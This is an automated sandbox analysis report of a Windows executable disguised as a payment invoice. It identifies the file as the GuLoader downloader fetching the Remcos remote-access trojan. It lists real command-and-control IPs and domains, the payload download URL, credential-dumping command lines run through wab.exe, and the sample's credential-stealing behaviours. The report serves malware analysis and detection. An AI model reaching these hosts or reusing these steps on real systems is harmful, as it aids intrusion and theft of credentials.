Windows Analysis Report
18001787_down_payment_invoice_90002104.exe

Overview

General Information

Sample Name: 18001787_down_payment_invoice_90002104.exe
Analysis ID: 1334833
MD5: 195787f942427352db785fea42c93f43
SHA1: 11349f0aa5059663c99bddb4b1d4925b0795d4c0
SHA256: 4957fb0faa66fa85bd02e198c98d741a6edf5f683538601bbc7099f88aa4ac30
Infos:

Detection

GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to steal Mail credentials (via file registry)
Contains functionality to modify clipboard data
Yara detected WebBrowserPassView password recovery tool
Uses dynamic DNS services
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
PE / OLE file has an invalid certificate
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • 18001787_down_payment_invoice_90002104.exe (PID: 3312 cmdline: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe MD5: 195787F942427352DB785FEA42C93F43)
    • wab.exe (PID: 1392 cmdline: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 6416 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ixfof" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 3152 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\szlggikjo" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 6492 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\utqzgbudcvrn" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
Malware Configuration / Threat Intelligence

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
No configs have been found
Yara Overview (dropped files)

Source: C:\Users\user\AppData\Roaming\paqlgkfs.dat | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security

Yara Overview (memory dumps)

Source: 00000003.00000002.40188235622.0000000000690000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_3 | Description: Yara detected GuLoader | Author: Joe Security
Source: 00000007.00000002.45052911947.0000000004C88000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000007.00000003.40526012940.0000000004C86000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000007.00000002.45046073128.0000000003AF9000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_2 | Description: Yara detected GuLoader | Author: Joe Security
Source: 00000003.00000002.40189422367.0000000003F89000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_2 | Description: Yara detected GuLoader | Author: Joe Security
Sigma Overview

No Sigma rule has matched
Snort IDS Alerts

Timestamp: 10/31/23-13:20:00.651244
SID: 2032776
Source IP: 192.168.11.20
Destination IP: 94.156.6.253
Source Port: 50077
Destination Port: 2402
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 10/31/23-13:26:11.604235
SID: 2032777
Source IP: 94.156.6.253
Destination IP: 192.168.11.20
Source Port: 2402
Destination Port: 50077
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 10/31/23-13:19:57.803142
SID: 2855192
Source IP: 192.168.11.20
Destination IP: 217.147.225.69
Source Port: 50076
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected


              AV Detection

Source: 18001787_down_payment_invoice_90002104.exe | Virustotal: Detection: 11%
Source: Yara match | File source: 00000007.00000002.45052911947.0000000004C88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.40526012940.0000000004C86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wab.exe PID: 1392, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
Source: http://gudanidevelopment.ge/IogvoayYhe139.binSchoSvltathirchimie.com/IogvoayYhe139.bin | Avira URL Cloud: Label: malware
Source: gudanidevelopment.ge | Virustotal: Detection: 17%
Source: ourt2949aslumes9.duckdns.org | Virustotal: Detection: 13%
Source: 18001787_down_payment_invoice_90002104.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 18001787_down_payment_invoice_90002104.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | Code function: 3_2_0040672B FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | Code function: 3_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | Code function: 3_2_00402868 FindFirstFileW
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_356310F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_35636580 FindFirstFileExA
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_0040AE51 FindFirstFileW,FindNextFileW
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen

              Networking

Source: Traffic | Snort IDS: 2855192 ETPRO TROJAN GuLoader Encoded Binary Request M2 192.168.11.20:50076 -> 217.147.225.69:80
Source: Traffic | Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.11.20:50077 -> 94.156.6.253:2402
Source: Traffic | Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 94.156.6.253:2402 -> 192.168.11.20:50077
Source: unknown | DNS query: name: ourt2949aslumes9.duckdns.org
Source: Joe Sandbox View | ASN Name: NET1-ASBG
Source: Joe Sandbox View | ASN Name: GRENA-ASTbilisiGeorgiaGE
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 94.156.6.253
Source: global traffic | HTTP traffic detected: GET /IogvoayYhe139.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: gudanidevelopment.ge | Cache-Control: no-cache
Source: global traffic | TCP traffic: 192.168.11.20:50077 -> 94.156.6.253:2402
Source: unknown | TCP traffic detected without corresponding DNS query: 94.156.6.253
Source: wab.exe, 00000007.00000002.45066782478.0000000035600000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.40221614069.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: wab.exe, wab.exe, 0000000B.00000002.40221614069.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: wab.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: wab.exe, 00000009.00000002.40254477336.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251675749.000000000469C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251931887.00000000046A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: wab.exe, 00000009.00000002.40254477336.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251675749.000000000469C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251931887.00000000046A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: wab.exe, 00000007.00000002.45066609211.0000000035570000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000007.00000002.45066609211.0000000035570000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.geotrust.com/GeoTrustECCCA2018.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.thawte.com/ThawteRSACA2018.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cdp.geotrust.com/GeoTrustECCCA2018.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cdp.thawte.com/ThawteRSACA2018.crl0L
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://certificates.godaddy.com/repository/0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://certs.godaddy.com/repository/1301
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://contentstorage.osi.office.net/
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl.globalsign.com/gsgccr3dvtlsca2020.crl0#
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl.godaddy.com/gdig2s1-2558.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertSHA2SecureServerCA.crl0=
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl0F
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crl0D
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-3.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g7.crl0/
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0L
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertSHA2SecureServerCA.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertSHA2SecureServerCA.crl0L
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crl0L
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-3.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0L
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g7.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crls.pki.goog/gts1c3/fVJxbV-Ktmk.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
              Source: wab.exe, 00000007.00000003.40256849481.0000000004CC2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.40202980557.0000000004CBB000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.40525599454.0000000004CC2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.40526012940.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.45052911947.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.45052676027.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.40203086900.0000000004CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 00000007.00000002.45052676027.0000000004C6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpn.net/LMEMH8
              Source: wab.exe, 00000007.00000003.40526012940.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.45052911947.0000000004C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpy
              Source: wab.exe, wab.exe, 00000007.00000002.45052911947.0000000004C88000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.45065735573.00000000342A0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000007.00000003.40526012940.0000000004C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gudanidevelopment.ge/IogvoayYhe139.bin
              Source: wab.exe, 00000007.00000002.45065735573.00000000342A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gudanidevelopment.ge/IogvoayYhe139.binSchoSvltathirchimie.com/IogvoayYhe139.bin
              Source: 18001787_down_payment_invoice_90002104.exe, Filamenterne.exe.7.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://o.ss2.us/0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.comodoca.com0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0B
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0F
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0G
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0H
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0K
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0M
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0O
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.globalsign.com/ca/gsovsha2g4r30
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr3dvtlsca20200V
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.godaddy.com/0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.godaddy.com/02
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.godaddy.com/05
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.pki.goog/gsr10)
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.pki.goog/gts1c301
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.pki.goog/gtsr100
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.rootg2.amazontrust.com08
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.sca1b.amazontrust.com06
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.sectigo.com0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.sectigo.com0%
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp2.globalsign.com/rootr30;
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocspx.digicert.com0E
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0$
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der07
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://s.ss2.us/r.crl0
              Source: 18001787_down_payment_invoice_90002104.exe, Filamenterne.exe.7.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: 18001787_down_payment_invoice_90002104.exe, Filamenterne.exe.7.drString found in binary or memory: http://s.symcd.com06
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr3dvtlsca2020.crt09
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://secure.globalsign.com/cacert/gsovsha2g4r3.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://status.geotrust.com0=
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://status.thawte.com09
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://trc.taboola.com/p3p.xml
              Source: 18001787_down_payment_invoice_90002104.exe, Filamenterne.exe.7.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: 18001787_down_payment_invoice_90002104.exe, Filamenterne.exe.7.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: 18001787_down_payment_invoice_90002104.exe, Filamenterne.exe.7.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://www.digicert.com/CPS0u
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://www.digicert.com/CPS0v
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://www.digicert.com/CPS0~
              Source: wab.exe, wab.exe, 0000000B.00000002.40221614069.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: wab.exe, wab.exe, 0000000B.00000002.40221938113.0000000002CBD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.40221614069.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 0000000B.00000002.40221415732.00000000000DC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/hrq
              Source: wab.exe, 0000000B.00000002.40221938113.0000000002CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
              Source: wab.exe, 00000007.00000002.45066782478.0000000035600000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.40221614069.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 00000007.00000002.45066782478.0000000035600000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.40221614069.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 00000009.00000002.40252547768.0000000000306000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: wab.exe, 0000000B.00000002.40221614069.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://x.ss2.us/x.cer0&
